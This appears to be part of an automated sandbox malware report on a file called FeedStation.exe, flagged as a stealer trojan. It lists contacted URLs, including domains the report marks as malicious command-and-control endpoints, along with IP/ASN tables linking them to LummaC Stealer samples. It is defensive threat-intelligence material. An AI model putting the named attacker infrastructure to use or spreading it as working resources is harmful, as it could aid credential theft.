                                                                                          https://s.ytimg.com;FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://steam.tv/FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.bradsoft.com/feeddemon/help/3.0/enclosures/FeedStation.exefalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://store.steampowered.com/privacy_agreement/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://store.steampowered.com/points/shop/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://sputnik-1985.com/.mgmdFeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              http://ocsp.rootca1.amazontrust.com0:FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://sketchfab.comFeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtab/FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://lv.queniujq.cnFeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brFeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.youtube.com/FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://store.steampowered.com/privacy_agreement/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_AFeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://sputnik-1985.com/FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.newsgator.com/FeedStation.exefalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/recaptcha/FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://checkout.steampowered.com/FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.newsgator.com/UFeedStation.exefalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://store.steampowered.com/;FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://store.steampowered.com/about/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://steamcommunity.com/my/wishlist/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://help.steampowered.com/en/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/market/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/news/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://recaptcha.net/recaptcha/;FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&amp;l=enFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/discussions/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://sputnik-1985.com/api#FeedStation.exe, 00000000.00000003.2400537991.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000002.2417006153.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                        unknown
                                                                                                                                                                        https://sputnik-1985.com/api2FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                        unknown
                                                                                                                                                                        https://store.steampowered.com/stats/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://medal.tvFeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://broadcast.st.dl.eccdnx.comFeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://sputnik-1985.com/.FeedStation.exe, 00000000.00000002.2416982397.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2411461978.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://store.steampowered.com/steam_refunds/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://x1.c.lencr.org/0FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://x1.i.lencr.org/0FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchFeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://sputnik-1985.com:443/apiFeedStation.exe, 00000000.00000003.2410786565.0000000000A23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://steamcommunity.com/workshop/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://login.steampowered.com/FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbFeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.allFeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://store.steampowered.com/legal/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoFeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://recaptcha.netFeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          104.21.112.1
                                                                                                                                                                                                                          sputnik-1985.comUnited States
                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          104.102.49.254
                                                                                                                                                                                                                          steamcommunity.comUnited States
                                                                                                                                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                          Analysis ID:1587453
                                                                                                                                                                                                                          Start date and time:2025-01-10 11:57:55 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 5m 14s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:4
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:FeedStation.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          • Number of executed functions: 8
                                                                                                                                                                                                                          • Number of non-executed functions: 103
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 40.126.32.72, 13.107.246.45, 20.12.23.50
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          05:59:12API Interceptor11x Sleep call for process: FeedStation.exe modified
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          104.21.112.1QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.buyspeechst.shop/w98i/
                                                                                                                                                                                                                          wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                          • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                                                                                                                                                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                          • beammp.com/phpmyadmin/
                                                                                                                                                                                                                          104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                          • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                          http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          sputnik-1985.comDodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.96.1
                                                                                                                                                                                                                          CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          [UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                                                                                          • 104.21.96.1
                                                                                                                                                                                                                          steamcommunity.comDodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          ModelsPreservation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          AKAMAI-ASUSDodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          ModelsPreservation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          CLOUDFLARENETUSDodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          Quarantined Messages(3).zipGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                                          https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 172.67.72.210
                                                                                                                                                                                                                          IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.96.1
                                                                                                                                                                                                                          CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          ModelsPreservation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          • 104.21.112.1
